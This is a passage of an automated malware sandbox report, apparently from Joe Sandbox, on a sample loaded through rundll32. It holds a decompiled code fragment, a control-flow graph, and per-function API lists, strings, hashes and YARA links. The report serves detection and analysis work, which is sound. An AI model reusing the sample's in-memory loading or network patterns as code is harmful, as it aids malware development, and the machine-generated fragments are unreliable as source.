				if (_t65 == 0) goto 0x6ee12cc;
				 *0x6eed2c0 = _t65;
				_t25 =  &(_t67[1]); // 0x8
				E00007FFA7FFA06EE1510(_t15, _t53, _t34, _t55, _t65, _t25,  *_t67);
				_t77 =  *0x6eed2c8; // 0x7ffa06ee0000
				_t65[8] = _t77;
				0x6ee14f0();
				UnmapViewOfFile(??);
				CloseHandle(??);
				return LocalFree(??);
			}






















                                                                  0x7ffa06ee1178
                                                                  0x7ffa06ee1178
                                                                  0x7ffa06ee1178
                                                                  0x7ffa06ee117d
                                                                  0x7ffa06ee1182
                                                                  0x7ffa06ee11a4
                                                                  0x7ffa06ee11ab
                                                                  0x7ffa06ee11b7
                                                                  0x7ffa06ee11bd
                                                                  0x7ffa06ee11cb
                                                                  0x7ffa06ee11d7
                                                                  0x7ffa06ee11e2
                                                                  0x7ffa06ee11ef
                                                                  0x7ffa06ee11fb
                                                                  0x7ffa06ee11fd
                                                                  0x7ffa06ee1208
                                                                  0x7ffa06ee120e
                                                                  0x7ffa06ee1215
                                                                  0x7ffa06ee1219
                                                                  0x7ffa06ee1220
                                                                  0x7ffa06ee1226
                                                                  0x7ffa06ee122c
                                                                  0x7ffa06ee122e
                                                                  0x7ffa06ee1232
                                                                  0x7ffa06ee1238
                                                                  0x7ffa06ee123b
                                                                  0x7ffa06ee1243
                                                                  0x7ffa06ee124c
                                                                  0x7ffa06ee1254
                                                                  0x7ffa06ee125a
                                                                  0x7ffa06ee125d
                                                                  0x7ffa06ee125d
                                                                  0x7ffa06ee1267
                                                                  0x7ffa06ee126b
                                                                  0x7ffa06ee1277
                                                                  0x7ffa06ee1279
                                                                  0x7ffa06ee127f
                                                                  0x7ffa06ee1282
                                                                  0x7ffa06ee128c
                                                                  0x7ffa06ee1298
                                                                  0x7ffa06ee129a
                                                                  0x7ffa06ee12a4
                                                                  0x7ffa06ee12ab
                                                                  0x7ffa06ee12b0
                                                                  0x7ffa06ee12b7
                                                                  0x7ffa06ee12be
                                                                  0x7ffa06ee12c6
                                                                  0x7ffa06ee12cf
                                                                  0x7ffa06ee12f6

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.412032786.00007FFA06EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFA06EE0000, based on PE: true
                                                                  • Associated: 00000004.00000002.412032786.00007FFA06EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffa06ee0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Local$AllocFileFree$View$CloseCreateHandleMappingUnmaplstrlen
                                                                  • String ID:
                                                                  • API String ID: 2463993602-0
                                                                  • Opcode ID: b47998b1ecbc8f342ac082ebb9bfc37411058539bbdec1a865a60cd560227bac
                                                                  • Instruction ID: 3d4fd6fa9673cc67cfea29e603ed98e7a9f52582cf788e64eee4b7d411e25874
                                                                  • Opcode Fuzzy Hash: b47998b1ecbc8f342ac082ebb9bfc37411058539bbdec1a865a60cd560227bac
                                                                  • Instruction Fuzzy Hash: D5414F32A09B4282EB10DB72F8206A973A1BB4ABD8F449135DE4E47799EF3CE545C600
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DB44A4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143filememoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$??3@AllocChangeCloseCreateFindNotificationReadVirtual_malloc_dbg
                                                                  • String ID: MZ
                                                                  • API String ID: 3363203691-2410715997
                                                                  • Opcode ID: 5e4af987994b7acbedf1a617c617516e2b7c83a12c39e074aeeec05ef4365be6
                                                                  • Instruction ID: de0053b95eee3fa0bc8beec7ff0f9646f3866a8081459d7cca80b842c482da7c
                                                                  • Opcode Fuzzy Hash: 5e4af987994b7acbedf1a617c617516e2b7c83a12c39e074aeeec05ef4365be6
                                                                  • Instruction Fuzzy Hash: 8B418530A0CE485FDB54EB68D8996AA73E1FB99311F00452AE48FC3184DB38F9518BC2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DB48C8 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 426COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 354 7df471db48c8-7df471db4902 356 7df471db492d-7df471db4936 354->356 357 7df471db4904-7df471db492b 354->357 358 7df471db493a-7df471db494c call 7df471db44a4 356->358 357->356 357->358 363 7df471db4952-7df471db4986 call 7df471db4034 358->363 364 7df471db4c76-7df471db4c89 358->364 377 7df471db498c-7df471db49af call 7df471db441c 363->377 378 7df471db4c1a-7df471db4c33 VirtualFree 363->378 367 7df471db4cb2-7df471db4cc5 364->367 368 7df471db4c8b-7df471db4c99 364->368 374 7df471db4cee-7df471db4d01 367->374 375 7df471db4cc7-7df471db4cd5 367->375 368->367 373 7df471db4c9b-7df471db4caf 368->373 373->367 375->374 383 7df471db4cd7-7df471db4ceb 375->383 385 7df471db49b5-7df471db49c7 377->385 386 7df471db4afa-7df471db4b00 377->386 378->364 379 7df471db4c35-7df471db4c45 378->379 379->364 382 7df471db4c47-7df471db4c50 379->382 387 7df471db4c71-7df471db4c74 382->387 383->374 385->386 388 7df471db49cd-7df471db49d0 385->388 386->378 390 7df471db4b06-7df471db4b09 386->390 387->364 389 7df471db4c52-7df471db4c54 387->389 391 7df471db49d2-7df471db49d5 388->391 392 7df471db49d7-7df471db49da 388->392 393 7df471db4c63-7df471db4c6e 389->393 394 7df471db4c56-7df471db4c5e call 7df471db46b4 389->394 390->378 395 7df471db4b0f-7df471db4b1a 390->395 391->392 397 7df471db49e1-7df471db49f1 call 7df471d903d8 391->397 398 7df471db49dc-7df471db49df 392->398 399 7df471db4a37-7df471db4a82 call 7df471db441c 392->399 393->387 394->393 395->378 396 7df471db4b20-7df471db4b34 395->396 396->378 401 7df471db4b3a-7df471db4b51 call 7df471db4608 396->401 408 7df471db49f3-7df471db49f6 397->408 409 7df471db4a1a-7df471db4a30 397->409 398->397 398->399 415 7df471db4a94-7df471db4a97 399->415 416 7df471db4a84-7df471db4a92 call 7df471dcf5d2 399->416 411 7df471db4b57-7df471db4b6d 401->411 412 7df471db4c09-7df471db4c14 401->412 408->409 413 7df471db49f8-7df471db4a04 408->413 409->388 414 7df471db4a32 409->414 411->412 422 7df471db4b73-7df471db4b81 411->422 412->378 412->401 413->386 417 7df471db4a0a-7df471db4a14 413->417 414->386 415->386 419 7df471db4a99-7df471db4ac2 415->419 416->386 417->386 417->409 419->386 424 7df471db4ac4-7df471db4af4 call 7df471dcf5d2 419->424 422->412 427 7df471db4b87-7df471db4b97 call 7df471dcf696 422->427 424->386 427->412 431 7df471db4b99-7df471db4bd0 call 7df471db3fd0 427->431 431->412 434 7df471db4bd2-7df471db4c04 call 7df471dcf5d2 call 7df471db3fd0 431->434 434->412
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID: MZ$MZ$MZ
                                                                  • API String ID: 1263568516-970779948
                                                                  • Opcode ID: 872aeec84cbaeb3725683b3f97cc31e77a18b92113d903afa561b5ea92fb0226
                                                                  • Instruction ID: 3b0e119ad1fa8be03d0852948d72349a7296f2b022cc83a70d874bf88c4b585a
                                                                  • Opcode Fuzzy Hash: 872aeec84cbaeb3725683b3f97cc31e77a18b92113d903afa561b5ea92fb0226
                                                                  • Instruction Fuzzy Hash: 7AD18430A1CA885BEBA4EF189859BAA73E1EBD5704F40452AD48FC3195DF78F8458BC1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471D927E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@_malloc_dbg
                                                                  • String ID: !Rcx
                                                                  • API String ID: 149304988-1190931699
                                                                  • Opcode ID: 375216cf1db1b95d5aee2b7e97bdc21f36d06a79622ee621d3fb19e0d25edae2
                                                                  • Instruction ID: 4a21c0901c0f29c7a2b96a5c7a5cbad29d7f4bf15c89c8909bf3e45157958547
                                                                  • Opcode Fuzzy Hash: 375216cf1db1b95d5aee2b7e97bdc21f36d06a79622ee621d3fb19e0d25edae2
                                                                  • Instruction Fuzzy Hash: 1731933061CA485FDB54EF18C88579AB7E4FBD4315F50453FD48EC2151EA34E546CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA23E4 Relevance: 4.6, APIs: 3, Instructions: 127registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: InformationOpenQueryValueVolume
                                                                  • String ID:
                                                                  • API String ID: 3064582257-0
                                                                  • Opcode ID: 53bae16748ecdc21ae953881b952189692968bc814a88933c73c387c58fe5f91
                                                                  • Instruction ID: c3b4de78e45d55c6aa9cf8f86a5cd69c711dad2b007d5bfca6bda79dd96848f3
                                                                  • Opcode Fuzzy Hash: 53bae16748ecdc21ae953881b952189692968bc814a88933c73c387c58fe5f91
                                                                  • Instruction Fuzzy Hash: 2841DB7151C7888BE765EF24D895BDBB7E0FBD4304F404A2EE58BC2191EF79A5048B82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DD44F4 Relevance: 4.6, APIs: 3, Instructions: 117COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Completion$CreateFileModesNotificationPortioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 1455841399-0
                                                                  • Opcode ID: 2ffc94b0a21e48c42bcc45a374f0656ae988c6d857e7144060324a3055d7017d
                                                                  • Instruction ID: 0cbd2f84a1e9a5876dfdb23388963a96a20946578b9adf1cfb18b3ed170849b8
                                                                  • Opcode Fuzzy Hash: 2ffc94b0a21e48c42bcc45a374f0656ae988c6d857e7144060324a3055d7017d
                                                                  • Instruction Fuzzy Hash: 9131833070C5545BFB649A18988D36A32E5FF95315F9000BBE8CFC2992DB29FC418ED5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA75AC Relevance: 4.6, APIs: 3, Instructions: 72fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateRead_calloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 2257410078-0
                                                                  • Opcode ID: a5499618f628a59e0d96b57db253cb0100af634853b51a4cee71ef425f696bbf
                                                                  • Instruction ID: 794a3c2d937967556037121628d9188e5439dff96da802fe0851d18782054649
                                                                  • Opcode Fuzzy Hash: a5499618f628a59e0d96b57db253cb0100af634853b51a4cee71ef425f696bbf
                                                                  • Instruction Fuzzy Hash: D8119630608A494FDBA0EF68D88876A77E5FBD9315F14463EE48EC3290DB39D905CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471E536CC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: X
                                                                  • API String ID: 0-3081909835
                                                                  • Opcode ID: 5b8f89fd01ffcab5325466948f567bc44c85a99fcdafc58f93a3656588ca7363
                                                                  • Instruction ID: b1086e3fe60fcd766fa123bd284bc5a13a829d329faffa30ad2ac97ab3c099f5
                                                                  • Opcode Fuzzy Hash: 5b8f89fd01ffcab5325466948f567bc44c85a99fcdafc58f93a3656588ca7363
                                                                  • Instruction Fuzzy Hash: 5E717F70918B488FD76CDF28C8853A677E4FB88311B10066ED9DBD3692E735B8468B81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471D92918 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc_dbg
                                                                  • String ID: !Rex
                                                                  • API String ID: 1527718024-279350133
                                                                  • Opcode ID: c06c5c98849e9df7b0606abe95abcd386699ff6728879cc7af8d853c28d6de16
                                                                  • Instruction ID: 3be595740c131a186dedc600b2bd7ed9e1898eff2104484b98d00680744ee0b2
                                                                  • Opcode Fuzzy Hash: c06c5c98849e9df7b0606abe95abcd386699ff6728879cc7af8d853c28d6de16
                                                                  • Instruction Fuzzy Hash: 1771EC3161CA849BD779EA14D495BDFB3E5FBD4300F40492AD4CFC2196EA34BA498AC2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471D92638 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc_dbg
                                                                  • String ID: <
                                                                  • API String ID: 1527718024-4251816714
                                                                  • Opcode ID: facb8d15b7ef9ec13e3b09c00d022012f8459e64aea036b22a2031390383be8b
                                                                  • Instruction ID: a71bb94f3e1f2a5d5ed2f6138e3d6df40d688018261e8b3afa5f7d6b3a6478c9
                                                                  • Opcode Fuzzy Hash: facb8d15b7ef9ec13e3b09c00d022012f8459e64aea036b22a2031390383be8b
                                                                  • Instruction Fuzzy Hash: 7151833160CA486FDF58EF24D4919AA73E1FFE8300701466AE88FC7256EA24F955CBC1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA0EF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFunctionLibraryLoadModeTable
                                                                  • String ID: {
                                                                  • API String ID: 3218182252-366298937
                                                                  • Opcode ID: ce8c5c31cd73c92eaa4bb109d3a5c28e0b34eac1a0d27fbc4dc84f37bbccbbdd
                                                                  • Instruction ID: 95b1c95c39901fe8a1fd030ffc5f13d6aa887131b852df2ff2178e45b7b85c18
                                                                  • Opcode Fuzzy Hash: ce8c5c31cd73c92eaa4bb109d3a5c28e0b34eac1a0d27fbc4dc84f37bbccbbdd
                                                                  • Instruction Fuzzy Hash: FE01652161C5442AE754A67958417A772E9EFD4350F41427BE49FC31C2EE18FC0546D2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DB46B4 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FileVirtual$AllocCreateFreeRead_malloc_dbg
                                                                  • String ID: MZ
                                                                  • API String ID: 3094449763-2410715997
                                                                  • Opcode ID: dc4bd1325c9b6ce831cdb2494975a3abfd7c2e64201de334ba9217b2b9306c25
                                                                  • Instruction ID: a829135153aae414df7a95687ac0eac2d1aecdb731a6185b05f4c06f9d3a6128
                                                                  • Opcode Fuzzy Hash: dc4bd1325c9b6ce831cdb2494975a3abfd7c2e64201de334ba9217b2b9306c25
                                                                  • Instruction Fuzzy Hash: 74516B31A1CA945FEBF4EA189845BAB72E5EBD5310F14056AE48FC3195DB38F8018BC2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000017ED6FD0000 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411208409.0000017ED6FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017ED6FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_17ed6fd0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 82552c8ceb4bd420dba5bcd59e8ddc246d38e28e5f7935b533cdb85efc16f220
                                                                  • Instruction ID: 40f57c34654132aa5be8f1a97c69aa6e0bdfa9c99e17c6098184bac95e0d6584
                                                                  • Opcode Fuzzy Hash: 82552c8ceb4bd420dba5bcd59e8ddc246d38e28e5f7935b533cdb85efc16f220
                                                                  • Instruction Fuzzy Hash: B651F33120CA054BD728EF5CC485AF9B3E1FB99391F14929DE58BC7182EE31F8128E80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA2677 Relevance: 3.1, APIs: 2, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@_calloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 372180527-0
                                                                  • Opcode ID: 276c063e93356f39a75f1bcb39732f00e41cbb9414687fe3efb2109651a33a7a
                                                                  • Instruction ID: d624234df20855a81f4d7f5cea5be94952340718fd60df68ba08905b8eef8340
                                                                  • Opcode Fuzzy Hash: 276c063e93356f39a75f1bcb39732f00e41cbb9414687fe3efb2109651a33a7a
                                                                  • Instruction Fuzzy Hash: 8041393061CA889FDBA5EF18C491AAA73E1FFD8300F500666D48AD7196DA38FD45CBC1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471D922E4 Relevance: 3.1, APIs: 2, Instructions: 109libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCallerLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 4215043672-0
                                                                  • Opcode ID: 360a3b14b73cf4ba8c025e592f2c7af1987442e7d978021b0d53979cebde274f
                                                                  • Instruction ID: a80834b42154d65fa43425b0fdce3bb16a71af886fe3e3567fbc9acf9aab0a79
                                                                  • Opcode Fuzzy Hash: 360a3b14b73cf4ba8c025e592f2c7af1987442e7d978021b0d53979cebde274f
                                                                  • Instruction Fuzzy Hash: 9321C731A0D94D5BE728A9589C4537633E4DB86321F16017FD8CBC7192F96DFC828AD1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DAE130 Relevance: 3.1, APIs: 2, Instructions: 71memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: a87dd15c5b21502df9a9a1958824b3b0c87cd0723e622a5a78e91728434a00fc
                                                                  • Instruction ID: e2bede159547a382b5ae1667ad19107029ebeb575286b0b87f9f1d974a239991
                                                                  • Opcode Fuzzy Hash: a87dd15c5b21502df9a9a1958824b3b0c87cd0723e622a5a78e91728434a00fc
                                                                  • Instruction Fuzzy Hash: 4F11943170CD084FEF84FB28EC95AAA73A6EBE5310704463AD44BC3150DE38E9098B81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA6B20 Relevance: 1.8, APIs: 1, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: 07ae41ad9e75d6dc00a3e87c854336894dcdea9e66a7a9ce9f6500f3c0e71712
                                                                  • Instruction ID: 9c74d1dd6d17ab39141b39f9f596af72919d38cbd9fa503daa41904dde3ca5ed
                                                                  • Opcode Fuzzy Hash: 07ae41ad9e75d6dc00a3e87c854336894dcdea9e66a7a9ce9f6500f3c0e71712
                                                                  • Instruction Fuzzy Hash: 34A1ED316189499FDB99EF28C491BA673A1FFD8300B504666E84AC7296DA38FD41CBC1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DAF200 Relevance: 1.7, APIs: 1, Instructions: 245registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: b1be3cc22f8079cd234e0ae30197ecf8b34efb11fdb22abb88b5cc59e6195b50
                                                                  • Instruction ID: db5cc5f90f37a1504a889cbf33e02785721371bfaf7520eba29898fdb62d3990
                                                                  • Opcode Fuzzy Hash: b1be3cc22f8079cd234e0ae30197ecf8b34efb11fdb22abb88b5cc59e6195b50
                                                                  • Instruction Fuzzy Hash: FA918B3151CB889FEB65EF29C48979BB7E1FBD8301F14492AA48EC3250DB74E545CB42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DD5384 Relevance: 1.7, APIs: 1, Instructions: 227networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Send
                                                                  • String ID:
                                                                  • API String ID: 121738739-0
                                                                  • Opcode ID: 025fd1521b03c48df47ad88bd262d16e2d3cd050fdda3960f0fce3c1fd7bbae2
                                                                  • Instruction ID: d7ee7592e3eb108a4d8a985429fc14e3db3e567aa6f35a7048b00530aeffad33
                                                                  • Opcode Fuzzy Hash: 025fd1521b03c48df47ad88bd262d16e2d3cd050fdda3960f0fce3c1fd7bbae2
                                                                  • Instruction Fuzzy Hash: F1816B70608A499FEB98DF28C4847A6B7F1FF94315F50426AD48EC7691EB35F844CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA8C4C Relevance: 1.7, APIs: 1, Instructions: 173registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: adb4356cc9c6a87139024e7379dcd3893e31279c0e3ba0ae376689aa6833c1b8
                                                                  • Instruction ID: 371901baead13a178546a730b03298cc4c2b203f5a7c6491c75607ff62e674e0
                                                                  • Opcode Fuzzy Hash: adb4356cc9c6a87139024e7379dcd3893e31279c0e3ba0ae376689aa6833c1b8
                                                                  • Instruction Fuzzy Hash: BC513A7062CB489FD758DF59D88656A77E1FBD9701F10492FE48BC2251DA34E842CB83
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DD4D7C Relevance: 1.7, APIs: 1, Instructions: 167networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Recv
                                                                  • String ID:
                                                                  • API String ID: 4192927123-0
                                                                  • Opcode ID: a5be54a69f3bf84269773a6cd7379ea69bad9d593bf99f2bbeacdfaef6688a3f
                                                                  • Instruction ID: 8d0d7db77d8935465b81569b47af3872fcc0a2fea7bc0290839e59e8f2eaef48
                                                                  • Opcode Fuzzy Hash: a5be54a69f3bf84269773a6cd7379ea69bad9d593bf99f2bbeacdfaef6688a3f
                                                                  • Instruction Fuzzy Hash: A2514971508A899FEBA4DF28C488796B7E4FF94314F5005AAD4CEC39A1DB39F944CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DAD200 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 1527718024-0
                                                                  • Opcode ID: 9045cd34264d0f61825811a11acd7615922ca1469bd678ead7aad3f293db595a
                                                                  • Instruction ID: ad8c8340ea81e541416d9f88872098c4a2d82f0ba40236252c2838f335350c3e
                                                                  • Opcode Fuzzy Hash: 9045cd34264d0f61825811a11acd7615922ca1469bd678ead7aad3f293db595a
                                                                  • Instruction Fuzzy Hash: C5415C31618D0E9FDB94EF2CD898A6577E0FBA8311714466BD40AC3664DB34E995CBC0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

